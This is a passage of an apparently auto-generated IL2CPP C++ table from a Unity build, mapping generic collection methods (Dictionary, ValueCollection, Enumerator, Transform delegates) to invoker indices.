2009/*(Il2CppMethodPointer)&Enumerator_get_CurrentKey_m447338908_AdjustorThunk*/, 3/*3*/}, { 2736, 2010/*(Il2CppMethodPointer)&Enumerator_get_CurrentValue_m3562053380_AdjustorThunk*/, 4/*4*/}, { 2737, 2011/*(Il2CppMethodPointer)&Enumerator_Reset_m761796566_AdjustorThunk*/, 0/*0*/}, { 2738, 2012/*(Il2CppMethodPointer)&Enumerator_VerifyState_m2118679243_AdjustorThunk*/, 0/*0*/}, { 2739, 2013/*(Il2CppMethodPointer)&Enumerator_VerifyCurrent_m4246196125_AdjustorThunk*/, 0/*0*/}, { 2740, 658/*(Il2CppMethodPointer)&Enumerator_Dispose_m2243145188_AdjustorThunk*/, 0/*0*/}, { 2741, 2014/*(Il2CppMethodPointer)&Enumerator__ctor_m1897170543_AdjustorThunk*/, 90/*90*/}, { 2742, 2015/*(Il2CppMethodPointer)&Enumerator_System_Collections_IEnumerator_get_Current_m2389891262_AdjustorThunk*/, 4/*4*/}, { 2743, 2016/*(Il2CppMethodPointer)&Enumerator_System_Collections_IEnumerator_Reset_m3302454658_AdjustorThunk*/, 0/*0*/}, { 2744, 2017/*(Il2CppMethodPointer)&Enumerator_System_Collections_IDictionaryEnumerator_get_Entry_m4077548725_AdjustorThunk*/, 306/*306*/}, { 2745, 2018/*(Il2CppMethodPointer)&Enumerator_System_Collections_IDictionaryEnumerator_get_Key_m2319419488_AdjustorThunk*/, 4/*4*/}, { 2746, 2019/*(Il2CppMethodPointer)&Enumerator_System_Collections_IDictionaryEnumerator_get_Value_m120250090_AdjustorThunk*/, 4/*4*/}, { 2747, 2020/*(Il2CppMethodPointer)&Enumerator_MoveNext_m266619810_AdjustorThunk*/, 43/*43*/}, { 2748, 2021/*(Il2CppMethodPointer)&Enumerator_get_Current_m3216113338_AdjustorThunk*/, 1511/*1511*/}, { 2749, 2022/*(Il2CppMethodPointer)&Enumerator_get_CurrentKey_m2387752419_AdjustorThunk*/, 227/*227*/}, { 2750, 2023/*(Il2CppMethodPointer)&Enumerator_get_CurrentValue_m3147984131_AdjustorThunk*/, 4/*4*/}, { 2751, 2024/*(Il2CppMethodPointer)&Enumerator_Reset_m1147555085_AdjustorThunk*/, 0/*0*/}, { 2752, 2025/*(Il2CppMethodPointer)&Enumerator_VerifyState_m1547102902_AdjustorThunk*/, 0/*0*/}, { 2753, 2026/*(Il2CppMethodPointer)&Enumerator_VerifyCurrent_m213906106_AdjustorThunk*/, 0/*0*/}, { 2754, 2027/*(Il2CppMethodPointer)&Enumerator_Dispose_m2117437651_AdjustorThunk*/, 0/*0*/}, { 2755, 2028/*(Il2CppMethodPointer)&Enumerator__ctor_m661036428_AdjustorThunk*/, 90/*90*/}, { 2756, 2029/*(Il2CppMethodPointer)&Enumerator_System_Collections_IEnumerator_get_Current_m1692692619_AdjustorThunk*/, 4/*4*/}, { 2757, 2030/*(Il2CppMethodPointer)&Enumerator_System_Collections_IEnumerator_Reset_m70453843_AdjustorThunk*/, 0/*0*/}, { 2758, 2031/*(Il2CppMethodPointer)&Enumerator_System_Collections_IDictionaryEnumerator_get_Entry_m3667889028_AdjustorThunk*/, 306/*306*/}, { 2759, 2032/*(Il2CppMethodPointer)&Enumerator_System_Collections_IDictionaryEnumerator_get_Key_m1214978221_AdjustorThunk*/, 4/*4*/}, { 2760, 2033/*(Il2CppMethodPointer)&Enumerator_System_Collections_IDictionaryEnumerator_get_Value_m313528997_AdjustorThunk*/, 4/*4*/}, { 2761, 2034/*(Il2CppMethodPointer)&Enumerator_MoveNext_m1856697671_AdjustorThunk*/, 43/*43*/}, { 2762, 2035/*(Il2CppMethodPointer)&Enumerator_get_Current_m1020413567_AdjustorThunk*/, 1512/*1512*/}, { 2763, 2036/*(Il2CppMethodPointer)&Enumerator_get_CurrentKey_m565000604_AdjustorThunk*/, 4/*4*/}, { 2764, 2037/*(Il2CppMethodPointer)&Enumerator_get_CurrentValue_m4143929484_AdjustorThunk*/, 43/*43*/}, { 2765, 2038/*(Il2CppMethodPointer)&Enumerator_Reset_m3115320746_AdjustorThunk*/, 0/*0*/}, { 2766, 2039/*(Il2CppMethodPointer)&Enumerator_VerifyState_m1165543189_AdjustorThunk*/, 0/*0*/}, { 2767, 2040/*(Il2CppMethodPointer)&Enumerator_VerifyCurrent_m3330382363_AdjustorThunk*/, 0/*0*/}, { 2768, 2041/*(Il2CppMethodPointer)&Enumerator_Dispose_m2711120408_AdjustorThunk*/, 0/*0*/}, { 2769, 2042/*(Il2CppMethodPointer)&Enumerator__ctor_m3597047336_AdjustorThunk*/, 90/*90*/}, { 2770, 2043/*(Il2CppMethodPointer)&Enumerator_System_Collections_IEnumerator_get_Current_m2010873149_AdjustorThunk*/, 4/*4*/}, { 2771, 2044/*(Il2CppMethodPointer)&Enumerator_System_Collections_IEnumerator_Reset_m3085583937_AdjustorThunk*/, 0/*0*/}, { 2772, 2045/*(Il2CppMethodPointer)&Enumerator_System_Collections_IDictionaryEnumerator_get_Entry_m487599172_AdjustorThunk*/, 306/*306*/}, { 2773, 2046/*(Il2CppMethodPointer)&Enumerator_System_Collections_IDictionaryEnumerator_get_Key_m677423231_AdjustorThunk*/, 4/*4*/}, { 2774, 2047/*(Il2CppMethodPointer)&Enumerator_System_Collections_IDictionaryEnumerator_get_Value_m3005608231_AdjustorThunk*/, 4/*4*/}, { 2775, 2048/*(Il2CppMethodPointer)&Enumerator_MoveNext_m435964161_AdjustorThunk*/, 43/*43*/}, { 2776, 2049/*(Il2CppMethodPointer)&Enumerator_get_Current_m1932198897_AdjustorThunk*/, 1513/*1513*/}, { 2777, 2050/*(Il2CppMethodPointer)&Enumerator_get_CurrentKey_m1408186928_AdjustorThunk*/, 4/*4*/}, { 2778, 2051/*(Il2CppMethodPointer)&Enumerator_get_CurrentValue_m2645962456_AdjustorThunk*/, 3/*3*/}, { 2779, 2052/*(Il2CppMethodPointer)&Enumerator_Reset_m1132695838_AdjustorThunk*/, 0/*0*/}, { 2780, 2053/*(Il2CppMethodPointer)&Enumerator_VerifyState_m3173176371_AdjustorThunk*/, 0/*0*/}, { 2781, 2054/*(Il2CppMethodPointer)&Enumerator_VerifyCurrent_m3278789713_AdjustorThunk*/, 0/*0*/}, { 2782, 2055/*(Il2CppMethodPointer)&Enumerator_Dispose_m401572848_AdjustorThunk*/, 0/*0*/}, { 2783, 2056/*(Il2CppMethodPointer)&ShimEnumerator__ctor_m3996137855_gshared*/, 90/*90*/}, { 2784, 2057/*(Il2CppMethodPointer)&ShimEnumerator_MoveNext_m3313047792_gshared*/, 43/*43*/}, { 2785, 2058/*(Il2CppMethodPointer)&ShimEnumerator_get_Entry_m2387156530_gshared*/, 306/*306*/}, { 2786, 2059/*(Il2CppMethodPointer)&ShimEnumerator_get_Key_m2823867931_gshared*/, 4/*4*/}, { 2787, 2060/*(Il2CppMethodPointer)&ShimEnumerator_get_Value_m3551354763_gshared*/, 4/*4*/}, { 2788, 2061/*(Il2CppMethodPointer)&ShimEnumerator_get_Current_m1093801549_gshared*/, 4/*4*/}, { 2789, 2062/*(Il2CppMethodPointer)&ShimEnumerator_Reset_m98005789_gshared*/, 0/*0*/}, { 2790, 2063/*(Il2CppMethodPointer)&ShimEnumerator__ctor_m1293350960_gshared*/, 90/*90*/}, { 2791, 2064/*(Il2CppMethodPointer)&ShimEnumerator_MoveNext_m3308190317_gshared*/, 43/*43*/}, { 2792, 2065/*(Il2CppMethodPointer)&ShimEnumerator_get_Entry_m3789806921_gshared*/, 306/*306*/}, { 2793, 2066/*(Il2CppMethodPointer)&ShimEnumerator_get_Key_m1171725158_gshared*/, 4/*4*/}, { 2794, 2067/*(Il2CppMethodPointer)&ShimEnumerator_get_Value_m635365372_gshared*/, 4/*4*/}, { 2795, 2068/*(Il2CppMethodPointer)&ShimEnumerator_get_Current_m3610131784_gshared*/, 4/*4*/}, { 2796, 2069/*(Il2CppMethodPointer)&ShimEnumerator_Reset_m2611430510_gshared*/, 0/*0*/}, { 2797, 2070/*(Il2CppMethodPointer)&ShimEnumerator__ctor_m2428699265_gshared*/, 90/*90*/}, { 2798, 2071/*(Il2CppMethodPointer)&ShimEnumerator_MoveNext_m2943029388_gshared*/, 43/*43*/}, { 2799, 2072/*(Il2CppMethodPointer)&ShimEnumerator_get_Entry_m2332479818_gshared*/, 306/*306*/}, { 2800, 2073/*(Il2CppMethodPointer)&ShimEnumerator_get_Key_m616785465_gshared*/, 4/*4*/}, { 2801, 2074/*(Il2CppMethodPointer)&ShimEnumerator_get_Value_m1396288849_gshared*/, 4/*4*/}, { 2802, 2075/*(Il2CppMethodPointer)&ShimEnumerator_get_Current_m2516732679_gshared*/, 4/*4*/}, { 2803, 2076/*(Il2CppMethodPointer)&ShimEnumerator_Reset_m2247049027_gshared*/, 0/*0*/}, { 2804, 2077/*(Il2CppMethodPointer)&ShimEnumerator__ctor_m1807768263_gshared*/, 90/*90*/}, { 2805, 2078/*(Il2CppMethodPointer)&ShimEnumerator_MoveNext_m2728191736_gshared*/, 43/*43*/}, { 2806, 2079/*(Il2CppMethodPointer)&ShimEnumerator_get_Entry_m2171963450_gshared*/, 306/*306*/}, { 2807, 2080/*(Il2CppMethodPointer)&ShimEnumerator_get_Key_m4014537779_gshared*/, 4/*4*/}, { 2808, 2081/*(Il2CppMethodPointer)&ShimEnumerator_get_Value_m1198202883_gshared*/, 4/*4*/}, { 2809, 2082/*(Il2CppMethodPointer)&ShimEnumerator_get_Current_m696250329_gshared*/, 4/*4*/}, { 2810, 2083/*(Il2CppMethodPointer)&ShimEnumerator_Reset_m208070833_gshared*/, 0/*0*/}, { 2811, 2084/*(Il2CppMethodPointer)&Transform_1__ctor_m2152205186_gshared*/, 211/*211*/}, { 2812, 2085/*(Il2CppMethodPointer)&Transform_1_Invoke_m4020530914_gshared*/, 1552/*1552*/}, { 2813, 2086/*(Il2CppMethodPointer)&Transform_1_BeginInvoke_m2179239469_gshared*/, 223/*223*/}, { 2814, 2087/*(Il2CppMethodPointer)&Transform_1_EndInvoke_m620026520_gshared*/, 1553/*1553*/}, { 2815, 2088/*(Il2CppMethodPointer)&Transform_1__ctor_m713310742_gshared*/, 211/*211*/}, { 2816, 2089/*(Il2CppMethodPointer)&Transform_1_Invoke_m1436021910_gshared*/, 1554/*1554*/}, { 2817, 2090/*(Il2CppMethodPointer)&Transform_1_BeginInvoke_m1786442111_gshared*/, 223/*223*/}, { 2818, 2091/*(Il2CppMethodPointer)&Transform_1_EndInvoke_m590952364_gshared*/, 1555/*1555*/}, { 2819, 2092/*(Il2CppMethodPointer)&Transform_1__ctor_m2914458810_gshared*/, 211/*211*/}, { 2820, 2093/*(Il2CppMethodPointer)&Transform_1_Invoke_m2347662626_gshared*/, 115/*115*/}, { 2821, 2094/*(Il2CppMethodPointer)&Transform_1_BeginInvoke_m1919808363_gshared*/, 223/*223*/}, { 2822, 2095/*(Il2CppMethodPointer)&Transform_1_EndInvoke_m1010744720_gshared*/, 40/*40*/}, { 2823, 2096/*(Il2CppMethodPointer)&Transform_1__ctor_m1237139657_gshared*/, 211/*211*/}, { 2824, 2097/*(Il2CppMethodPointer)&Transform_1_Invoke_m2675095773_gshared*/, 1556/*1556*/}, { 2825, 2098/*(Il2CppMethodPointer)&Transform_1_BeginInvoke_m4270324442_gshared*/, 1557/*1557*/}, { 2826, 2099/*(Il2CppMethodPointer)&Transform_1_EndInvoke_m4121732147_gshared*/, 1553/*1553*/}, { 2827, 2100/*(Il2CppMethodPointer)&Transform_1__ctor_m4075225366_gshared*/, 211/*211*/}, { 2828, 2101/*(Il2CppMethodPointer)&Transform_1_Invoke_m1023901590_gshared*/, 1558/*1558*/}, { 2829, 2102/*(Il2CppMethodPointer)&Transform_1_BeginInvoke_m345445247_gshared*/, 1557/*1557*/}, { 2830, 2103/*(Il2CppMethodPointer)&Transform_1_EndInvoke_m3664875948_gshared*/, 1559/*1559*/}, { 2831, 2104/*(Il2CppMethodPointer)&Transform_1__ctor_m3731381235_gshared*/, 211/*211*/}, { 2832, 2105/*(Il2CppMethodPointer)&Transform_1_Invoke_m1111426439_gshared*/, 392/*392*/}, { 2833, 2106/*(Il2CppMethodPointer)&Transform_1_BeginInvoke_m3901963208_gshared*/, 1557/*1557*/}, { 2834, 2107/*(Il2CppMethodPointer)&Transform_1_EndInvoke_m275018665_gshared*/, 40/*40*/}, { 2835, 2108/*(Il2CppMethodPointer)&Transform_1__ctor_m3569730739_gshared*/, 211/*211*/}, { 2836, 2109/*(Il2CppMethodPointer)&Transform_1_Invoke_m2906736839_gshared*/, 225/*225*/}, { 2837, 2110/*(Il2CppMethodPointer)&Transform_1_BeginInvoke_m3826027984_gshared*/, 1084/*1084*/}, { 2838, 2111/*(Il2CppMethodPointer)&Transform_1_EndInvoke_m258407721_gshared*/, 1/*1*/}, { 2839, 2112/*(Il2CppMethodPointer)&Transform_1__ctor_m1978472014_gshared*/, 211/*211*/}, { 2840, 2113/*(Il2CppMethodPointer)&Transform_1_Invoke_m2509306846_gshared*/, 1560/*1560*/}, { 2841, 2114/*(Il2CppMethodPointer)&Transform_1_BeginInvoke_m1167293475_gshared*/, 1084/*1084*/}, { 2842, 2115/*(Il2CppMethodPointer)&Transform_1_EndInvoke_m2742732284_gshared*/, 1553/*1553*/}, { 2843, 2116/*(Il2CppMethodPointer)&Transform_1__ctor_m974062490_gshared*/, 211/*211*/}, { 2844, 2117/*(Il2CppMethodPointer)&Transform_1_Invoke_m4136847354_gshared*/, 1561/*1561*/}, { 2845, 2118/*(Il2CppMethodPointer)&Transform_1_BeginInvoke_m2640141359_gshared*/, 1084/*1084*/}, { 2846, 2119/*(Il2CppMethodPointer)&Transform_1_EndInvoke_m3779953636_gshared*/, 1562/*1562*/}, { 2847, 2120/*(Il2CppMethodPointer)&Transform_1__ctor_m353209818_gshared*/, 211/*211*/}, { 2848, 2121/*(Il2CppMethodPointer)&Transform_1_Invoke_m719893226_gshared*/, 1563/*1563*/}, { 2849, 2122/*(Il2CppMethodPointer)&Transform_1_BeginInvoke_m786657825_gshared*/, 644/*644*/}, { 2850, 2123/*(Il2CppMethodPointer)&Transform_1_EndInvoke_m664119620_gshared*/, 1553/*1553*/}, { 2851, 2124/*(Il2CppMethodPointer)&Transform_1__ctor_m583305686_gshared*/, 211/*211*/}, { 2852, 2125/*(Il2CppMethodPointer)&Transform_1_Invoke_m1172879766_gshared*/, 1564/*1564*/}, { 2853, 2126/*(Il2CppMethodPointer)&Transform_1_BeginInvoke_m2336029567_gshared*/, 644/*644*/}, { 2854, 2127/*(Il2CppMethodPointer)&Transform_1_EndInvoke_m1025924012_gshared*/, 1565/*1565*/}, { 2855, 2128/*(Il2CppMethodPointer)&Transform_1__ctor_m1642784939_gshared*/, 211/*211*/}, { 2856, 2129/*(Il2CppMethodPointer)&Transform_1_Invoke_m2099058127_gshared*/, 105/*105*/}, { 2857, 2130/*(Il2CppMethodPointer)&Transform_1_BeginInvoke_m3169382212_gshared*/, 644/*644*/}, { 2858, 2131/*(Il2CppMethodPointer)&Transform_1_EndInvoke_m7550125_gshared*/, 5/*5*/}, { 2859, 2132/*(Il2CppMethodPointer)&Transform_1__ctor_m4161450529_gshared*/, 211/*211*/}, { 2860, 2133/*(Il2CppMethodPointer)&Transform_1_Invoke_m2770612589_gshared*/, 1198/*1198*/}, { 2861, 2134/*(Il2CppMethodPointer)&Transform_1_BeginInvoke_m3014766640_gshared*/, 114/*114*/}, { 2862, 2135/*(Il2CppMethodPointer)&Transform_1_EndInvoke_m803975703_gshared*/, 1553/*1553*/}, { 2863, 2136/*(Il2CppMethodPointer)&Transform_1__ctor_m2658320534_gshared*/, 211/*211*/}, { 2864, 2137/*(Il2CppMethodPointer)&Transform_1_Invoke_m1976033878_gshared*/, 1195/*1195*/}, { 2865, 2138/*(Il2CppMethodPointer)&Transform_1_BeginInvoke_m3105433791_gshared*/, 114/*114*/}, { 2866, 2139/*(Il2CppMethodPointer)&Transform_1_EndInvoke_m687617772_gshared*/, 1566/*1566*/}, { 2867, 2140/*(Il2CppMethodPointer)&Enumerator__ctor_m2988407410_AdjustorThunk*/, 90/*90*/}, { 2868, 2141/*(Il2CppMethodPointer)&Enumerator_System_Collections_IEnumerator_get_Current_m1648049763_AdjustorThunk*/, 4/*4*/}, { 2869, 2142/*(Il2CppMethodPointer)&Enumerator_System_Collections_IEnumerator_Reset_m655633499_AdjustorThunk*/, 0/*0*/}, { 2870, 651/*(Il2CppMethodPointer)&Enumerator_Dispose_m2369319718_AdjustorThunk*/, 0/*0*/}, { 2871, 650/*(Il2CppMethodPointer)&Enumerator_MoveNext_m1091131935_AdjustorThunk*/, 43/*43*/}, { 2872, 649/*(Il2CppMethodPointer)&Enumerator_get_Current_m3006348140_AdjustorThunk*/, 4/*4*/}, { 2873, 2143/*(Il2CppMethodPointer)&Enumerator__ctor_m1320388337_AdjustorThunk*/, 90/*90*/}, { 2874, 2144/*(Il2CppMethodPointer)&Enumerator_System_Collections_IEnumerator_get_Current_m2160496972_AdjustorThunk*/, 4/*4*/}, { 2875, 2145/*(Il2CppMethodPointer)&Enumerator_System_Collections_IEnumerator_Reset_m1146954164_AdjustorThunk*/, 0/*0*/}, { 2876, 2146/*(Il2CppMethodPointer)&Enumerator_Dispose_m1062622161_AdjustorThunk*/, 0/*0*/}, { 2877, 2147/*(Il2CppMethodPointer)&Enumerator_MoveNext_m1404007384_AdjustorThunk*/, 43/*43*/}, { 2878, 2148/*(Il2CppMethodPointer)&Enumerator_get_Current_m419581838_AdjustorThunk*/, 4/*4*/}, { 2879, 2149/*(Il2CppMethodPointer)&Enumerator__ctor_m908409898_AdjustorThunk*/, 90/*90*/}, { 2880, 2150/*(Il2CppMethodPointer)&Enumerator_System_Collections_IEnumerator_get_Current_m2625473469_AdjustorThunk*/, 4/*4*/}, { 2881, 2151/*(Il2CppMethodPointer)&Enumerator_System_Collections_IEnumerator_Reset_m2909592833_AdjustorThunk*/, 0/*0*/}, { 2882, 2152/*(Il2CppMethodPointer)&Enumerator_Dispose_m1323464986_AdjustorThunk*/, 0/*0*/}, { 2883, 2153/*(Il2CppMethodPointer)&Enumerator_MoveNext_m1212551889_AdjustorThunk*/, 43/*43*/}, { 2884, 2154/*(Il2CppMethodPointer)&Enumerator_get_Current_m2986380627_AdjustorThunk*/, 43/*43*/}, { 2885, 2155/*(Il2CppMethodPointer)&Enumerator__ctor_m3539306986_AdjustorThunk*/, 90/*90*/}, { 2886, 2156/*(Il2CppMethodPointer)&Enumerator_System_Collections_IEnumerator_get_Current_m1805365227_AdjustorThunk*/, 4/*4*/}, { 2887, 2157/*(Il2CppMethodPointer)&Enumerator_System_Collections_IEnumerator_Reset_m3294415347_AdjustorThunk*/, 0/*0*/}, { 2888, 2158/*(Il2CppMethodPointer)&Enumerator_Dispose_m2532362830_AdjustorThunk*/, 0/*0*/}, { 2889, 2159/*(Il2CppMethodPointer)&Enumerator_MoveNext_m2534596951_AdjustorThunk*/, 43/*43*/}, { 2890, 2160/*(Il2CppMethodPointer)&Enumerator_get_Current_m2838387513_AdjustorThunk*/, 3/*3*/}, { 2891, 2161/*(Il2CppMethodPointer)&ValueCollection__ctor_m882866357_gshared*/, 90/*90*/}, { 2892, 2162/*(Il2CppMethodPointer)&ValueCollection_System_Collections_Generic_ICollectionU3CTValueU3E_Add_m1903672223_gshared*/, 90/*90*/}, { 2893, 2163/*(Il2CppMethodPointer)&ValueCollection_System_Collections_Generic_ICollectionU3CTValueU3E_Clear_m3271993638_gshared*/, 0/*0*/}, { 2894, 2164/*(Il2CppMethodPointer)&ValueCollection_System_Collections_Generic_ICollectionU3CTValueU3E_Contains_m3958350925_gshared*/, 1/*1*/}, { 2895, 2165/*(Il2CppMethodPointer)&ValueCollection_System_Collections_Generic_ICollectionU3CTValueU3E_Remove_m98888100_gshared*/, 1/*1*/}, { 2896, 2166/*(Il2CppMethodPointer)&ValueCollection_System_Collections_Generic_IEnumerableU3CTValueU3E_GetEnumerator_m1604400448_gshared*/, 4/*4*/}, { 2897, 2167/*(Il2CppMethodPointer)&ValueCollection_System_Collections_ICollection_CopyTo_m2627730402_gshared*/, 86/*86*/}, { 2898, 2168/*(Il2CppMethodPointer)&ValueCollection_System_Collections_IEnumerable_GetEnumerator_m1073215119_gshared*/, 4/*4*/}, { 2899, 2169/*(Il2CppMethodPointer)&ValueCollection_System_Collections_Generic_ICollectionU3CTValueU3E_get_IsReadOnly_m1325719984_gshared*/, 43/*43*/}, { 2900, 2170/*(Il2CppMethodPointer)&ValueCollection_System_Collections_ICollection_get_IsSynchronized_m4041633470_gshared*/, 43/*43*/}, { 2901, 2171/*(Il2CppMethodPointer)&ValueCollection_System_Collections_ICollection_get_SyncRoot_m3927965720_gshared*/, 4/*4*/}, { 2902, 2172/*(Il2CppMethodPointer)&ValueCollection_CopyTo_m1460341186_gshared*/, 86/*86*/}, { 2903, 648/*(Il2CppMethodPointer)&ValueCollection_GetEnumerator_m520082450_gshared*/, 1217/*1217*/}, { 2904, 2173/*(Il2CppMethodPointer)&ValueCollection_get_Count_m90930038_gshared*/, 3/*3*/}, { 2905, 2174/*(Il2CppMethodPointer)&ValueCollection__ctor_m1760151388_gshared*/, 90/*90*/}, { 2906, 2175/*(Il2CppMethodPointer)&ValueCollection_System_Collections_Generic_ICollectionU3CTValueU3E_Add_m4281311350_gshared*/, 90/*90*/}, { 2907, 2176/*(Il2CppMethodPointer)&ValueCollection_System_Collections_Generic_ICollectionU3CTValueU3E_Clear_m3471385195_gshared*/, 0/*0*/}, { 2908, 2177/*(Il2CppMethodPointer)&ValueCollection_System_Collections_Generic_ICollectionU3CTValueU3E_Contains_m3650367146_gshared*/, 1/*1*/}, { 2909, 2178/*(Il2CppMethodPointer)&ValueCollection_System_Collections_Generic_ICollectionU3CTValueU3E_Remove_m4188992987_gshared*/, 1/*1*/}, { 2910, 2179/*(Il2CppMethodPointer)&ValueCollection_System_Collections_Generic_IEnumerableU3CTValueU3E_GetEnumerator_m3930535201_gshared*/, 4/*4*/}, { 2911, 2180/*(Il2CppMethodPointer)&ValueCollection_System_Collections_ICollection_CopyTo_m2212134845_gshared*/, 86/*86*/}, { 2912, 2181/*(Il2CppMethodPointer)&ValueCollection_System_Collections_IEnumerable_GetEnumerator_m2109355710_gshared*/, 4/*4*/}, { 2913, 2182/*(Il2CppMethodPointer)&ValueCollection_System_Collections_Generic_ICollectionU3CTValueU3E_get_IsReadOnly_m3022741191_gshared*/, 43/*43*/}, { 2914, 2183/*(Il2CppMethodPointer)&ValueCollection_System_Collections_ICollection_get_IsSynchronized_m2217081553_gshared*/, 43/*43*/}, { 2915, 2184/*(Il2CppMethodPointer)&ValueCollection_System_Collections_ICollection_get_SyncRoot_m3253749389_gshared*/, 4/*4*/}, { 2916, 2185/*(Il2CppMethodPointer)&ValueCollection_CopyTo_m254858027_gshared*/, 86/*86*/}, { 2917, 2186/*(Il2CppMethodPointer)&ValueCollection_GetEnumerator_m2859673798_gshared*/, 1567/*1567*/}, { 2918, 2187/*(Il2CppMethodPointer)&ValueCollection_get_Count_m3277366953_gshared*/, 3/*3*/}, { 2919, 2188/*(Il2CppMethodPointer)&ValueCollection__ctor_m1825701219_gshared*/, 90/*90*/}, { 2920, 2189/*(Il2CppMethodPointer)&ValueCollection_System_Collections_Generic_ICollectionU3CTValueU3E_Add_m1367462045_gshared*/, 44/*44*/}, { 2921, 2190/*(Il2CppMethodPointer)&ValueCollection_System_Collections_Generic_ICollectionU3CTValueU3E_Clear_m276534782_gshared*/, 0/*0*/}, { 2922, 2191/*(Il2CppMethodPointer)&ValueCollection_System_Collections_Generic_ICollectionU3CTValueU3E_Contains_m3742779759_gshared*/, 64/*64*/}, { 2923, 2192/*(Il2CppMethodPointer)&ValueCollection_System_Collections_Generic_ICollectionU3CTValueU3E_Remove_m270427956_gshared*/, 64/*64*/}, { 2924, 2193/*(Il2CppMethodPointer)&ValueCollection_System_Collections_Generic_IEnumerableU3CTValueU3E_GetEnumerator_m971481852_gshared*/, 4/*4*/}, { 2925, 2194/*(Il2CppMethodPointer)&ValueCollection_System_Collections_ICollection_CopyTo_m3262726594_gshared*/, 86/*86*/}, { 2926, 2195/*(Il2CppMethodPointer)&ValueCollection_System_Collections_IEnumerable_GetEnumerator_m1058162477_gshared*/, 4/*4*/}, { 2927, 2196/*(Il2CppMethodPointer)&ValueCollection_System_Collections_Generic_ICollectionU3CTValueU3E_get_IsReadOnly_m3005456072_gshared*/, 43/*43*/}, { 2928, 2197/*(Il2CppMethodPointer)&ValueCollection_System_Collections_ICollection_get_IsSynchronized_m2117667642_gshared*/, 43/*43*/}, { 2929, 2198/*(Il2CppMethodPointer)&ValueCollection_System_Collections_ICollection_get_SyncRoot_m568936428_gshared*/, 4/*4*/}, { 2930, 2199/*(Il2CppMethodPointer)&ValueCollection_CopyTo_m2890257710_gshared*/, 86/*86*/}, { 2931, 2200/*(Il2CppMethodPointer)&ValueCollection_GetEnumerator_m1860544291_gshared*/, 1568/*1568*/}, { 2932, 2201/*(Il2CppMethodPointer)&ValueCollection_get_Count_m494337310_gshared*/, 3/*3*/}, { 2933, 2202/*(Il2CppMethodPointer)&ValueCollection__ctor_m927733289_gshared*/, 90/*90*/}, { 2934, 2203/*(Il2CppMethodPointer)&ValueCollection_System_Collections_Generic_ICollectionU3CTValueU3E_Add_m3594901543_gshared*/, 42/*42*/}, { 2935, 2204/*(Il2CppMethodPointer)&ValueCollection_System_Collections_Generic_ICollectionU3CTValueU3E_Clear_m231380274_gshared*/, 0/*0*/}, { 2936, 2205/*(Il2CppMethodPointer)&ValueCollection_System_Collections_Generic_ICollectionU3CTValueU3E_Contains_m1693788217_gshared*/, 25/*25*/}, { 2937, 2206/*(Il2CppMethodPointer)&ValueCollection_System_Collections_Generic_ICollectionU3CTValueU3E_Remove_m2185557816_gshared*/, 25/*25*/}, { 2938, 2207/*(Il2CppMethodPointer)&ValueCollection_System_Collections_Generic_IEnumerableU3CTValueU3E_GetEnumerator_m20320216_gshared*/, 4/*4*/}, { 2939, 2208/*(Il2CppMethodPointer)&ValueCollection_System_Collections_ICollection_CopyTo_m592924266_gshared*/, 86/*86*/}, { 2940, 2209/*(Il2CppMethodPointer)&ValueCollection_System_Collections_IEnumerable_GetEnumerator_m802880903_gshared*/, 4/*4*/}, { 2941, 2210/*(Il2CppMethodPointer)&ValueCollection_System_Collections_Generic_ICollectionU3CTValueU3E_get_IsReadOnly_m1915900932_gshared*/, 43/*43*/}, { 2942, 2211/*(Il2CppMethodPointer)&ValueCollection_System_Collections_ICollection_get_IsSynchronized_m45572582_gshared*/, 43/*43*/}, { 2943, 2212/*(Il2CppMethodPointer)&ValueCollection_System_Collections_ICollection_get_SyncRoot_m1458344512_gshared*/, 4/*4*/}, { 2944, 2213/*(Il2CppMethodPointer)&ValueCollection_CopyTo_m2713467670_gshared*/, 86/*86*/}, { 2945, 2214/*(Il2CppMethodPointer)&ValueCollection_GetEnumerator_m988596833_gshared*/, 1569/*1569*/}, { 2946, 2215/*(Il2CppMethodPointer)&ValueCollection_get_Count_m4142113966_gshared*/, 3/*3*/}, { 2947, 633/*(Il2CppMethodPointer)&Dictionary_2__ctor_m1868603968_gshared*/, 0/*0*/}, { 2948, 2216/*(Il2CppMethodPointer)&Dictionary_2__ctor_m2284756127_gshared*/, 90/*90*/}, { 2949, 2217/*(Il2CppMethodPointer)&Dictionary_2__ctor_m3111963761_gshared*/, 42/*42*/}, { 2950, 2218/*(Il2CppMethodPointer)&Dictionary_2__ctor_m965168575_gshared*/, 172/*172*/}, { 2951, 2219/*(Il2CppMethodPointer)&Dictionary_2_System_Collections_IDictionary_get_Item_m2945412702_gshared*/, 40/*40*/}, { 2952, 2220/*(Il2CppMethodPointer)&Dictionary_2_System_Collections_IDictionary_set_Item_m941667911_gshared*/, 8/*8*/}, { 2953, 2221/*(Il2CppMethodPointer)&Dictionary_2_System_Collections_IDictionary_Add_m3189569330_gshared*/, 8/*8*/}, { 2954, 2222/*(Il2CppMethodPointer)&Dictionary_2_System_Collections_IDictionary_Remove_m3199539467_gshared*/, 90/*90*/}, { 2955, 2223/*(Il2CppMethodPointer)&Dictionary_2_System_Collections_ICollection_get_IsSynchronized_m304009368_gshared*/, 43/*43*/}, { 2956, 2224/*(Il2CppMethodPointer)&Dictionary_2_System_Collections_ICollection_get_SyncRoot_m2487129350_gshared*/, 4/*4*/}, { 2957, 2225/*(Il2CppMethodPointer)&Dictionary_2_System_Collections_Generic_ICollectionU3CSystem_Collections_Generic_KeyValuePairU3CTKeyU2CTValueU3EU3E_get_IsReadOnly_m1111602362_gshared*/, 43/*43*/}, { 2958, 2226/*(Il2CppMethodPointer)&Dictionary_2_System_Collections_Generic_ICollectionU3CSystem_Collections_Generic_KeyValuePairU3CTKeyU2CTValueU3EU3E_Add_m1043757703_gshared*/, 1366/*1366*/}, { 2959, 2227/*(Il2CppMethodPointer)&Dictionary_2_System_Collections_Generic_ICollectionU3CSystem_Collections_Generic_KeyValuePairU3CTKeyU2CTValueU3EU3E_Contains_m1927335261_gshared*/, 1261/*1261*/}, { 2960, 2228/*(Il2CppMethodPointer)&Dictionary_2_System_Collections_Generic_ICollectionU3CSystem_Collections_Generic_KeyValuePairU3CTKeyU2CTValueU3EU3E_CopyTo_m3678641635_gshared*/, 86/*86*/}, { 2961, 2229/*(Il2CppMethodPointer)&Dictionary_2_System_Collections_Generic_ICollectionU3CSystem_Collections_Generic_KeyValuePairU3CTKeyU2CTValueU3EU3E_Remove_m181279132_gshared*/, 1261/*1261*/}, { 2962, 2230/*(Il2CppMethodPointer)&Dictionary_2_System_Collections_ICollection_CopyTo_m1985034736_gshared*/, 86/*86*/}, { 2963, 